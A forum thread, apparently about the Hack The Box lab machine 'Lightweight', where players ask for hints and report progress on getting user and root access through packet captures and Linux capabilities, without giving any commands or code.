Lightweight

Can somebody help with the initial user, I am getting nothing interesting in the tc****p output. Stuck on it from 3 days. Please DM.
Thanks

can someone PM on what to do with the trigger and listen part? I am a bit stuck, I have found there is a certain page that takes longer to respond and I am connected with SSH but not sure how to listen and how to listen

Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

Good luck and have fun

hey guys i found ld******2 hash password, but iam really stuck now…
can you pm me for hint?

Got user, and root shell!
An awesome machine to learn a lot about linux capabilities and networking!
Also if you google good enough there are some awesome tutorials about how to do priv esc with that.

Hi guys and girls!
this is my first try on a HTB-box and I really can’t get very far. All I have is a the ssh connectioj to my user account and a few dump-files from wireshark, where i cannot find any useful info yet… getting a little frustrated.

The hints with “capabilities” etc. didn’t helkp me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

Thanks in advance :slight_smile:

Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance :slight_smile:

I got some sdbm things, I don’t know how to use them, hel!

Anyone can give me a hint towards the user? Got already some dump and some data, dont know what to do with it. Thanks!

I found two binaries in the dir. And found there is something related to capability
And followed that medium article
But still I am getting permission denied in reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks

Can anyone help me with the user stage? Send me a pm :slight_smile:

Stuck at the root stage.
Found user.txt.